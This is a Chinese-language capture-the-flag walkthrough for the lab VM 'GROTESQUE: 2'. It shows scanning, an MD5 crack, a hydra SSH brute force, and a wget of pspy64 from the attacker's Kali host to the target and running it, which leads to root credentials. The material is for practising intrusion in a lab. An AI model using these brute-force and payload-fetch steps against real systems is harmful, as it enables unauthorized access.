简介:获取标志(难度: 中等)
1、下载靶场
靶机名称:GROTESQUE: 2
下载地址:
2、安装靶场
以DC-1为例,将文件解压(一压缩包形式进行下载)。
打开虚拟机,选择解压好的文件导入虚拟机( vof 版本高于4.0,点击重试即可导入)
导入成功,开启此虚拟机( 当页面出现 grotesque login 时表示安装成功)。
3、获取靶机的flag(两个flag)
前提:
1、已知kali的IP地址(ifconfig) —— kali IP地址:192.168.108.129/24 | 2、grotesque和kali在同一网段 | 已知grotesque所在的网段 —— grotesque IP地址:192.168.108.157/24 |
信息收集
获取grotesque的IP地址
命令:netdiscover -r 192.168.108.157/24
由图可知grotesque的IP地址是:192.168.108.157/24
端口扫描
命令:nmap -sV -p- -O 192.168.108.157
//-sV:扫描系统版本和程序版本号检测,-p-:全端口扫描
很奇怪,这个靶机开了500+个都端口,随便查看了一下各个端口的服务,,发现显示图片和源代码都是一样的
这里需要进行比对wget去把这些页面下载下来看一下文件是否有区别
for i in {23..556};do wget 192.168.108.157:$i -O index$i;done
按照文件大小进行排序,明显最后一个的大小有问题,查看一下256端口
ls -al | sort
在258都那口获取到提示信息
SSH:satan、raphael、 angel、distress、greed、lust
在第二行的图片上面有了发现,虽然有点费眼睛,但是得到一串hash值
再根据提示将hash-100,最后获得hash:b6e705ea1249e2bb7b01d7dac91cd0b3
通过md5解密(https://www.somd5.com/)获得密码:solomon1
使用密码:solomon1和账号:satan、raphael、angel、distress、greed、lust 对ssh进行暴力破解
hydra -L /root/Desktop/g2_user -p solomon1 ssh://192.168.108.157
获取到一组账号密码(angel、solomon1):
[22][ssh] host: 192.168.108.157 login: angel password: solomon1
使用账号密码(angel、solomon1)ssh登录之后在当前目录下获取到第一个flag
查看是否存在和sudo提权suid提权
sudo -l
find / -perm -4000 2>/dev/null
上传一个pspy64看一下有什么计划任务
python2 -m SimpleHTTPServer 9999
wget http://192.168.108.129:9999/pspy64s、
chmod 7777 pspy64s
./pspy64s
发现差不多每一分钟就会运行write.sh脚本和check.sh脚本
猜测之前发现 /home/angel/quiet 文件夹中有会多文件会不会就是这个脚本写的
删除quiet目录下所有文件后 ,发现在一分钟左右又会重新写入一堆东西,而且在删除之后发现根目录下新出现一个rootcreds.txt文件
应该是要写文件但是目录满了,所以需要把quiet目录下文件全部删除了才会出现rootcreds.txt文件,查看之后获得了root的密码:sweetchild
使用账号密码(root、sweetchild)切换到root账号,,在root的家目录下发现了第二个flag
点击
下方名片
,加入GG安全团队,期待师傅们的加入,一起学习一起成长。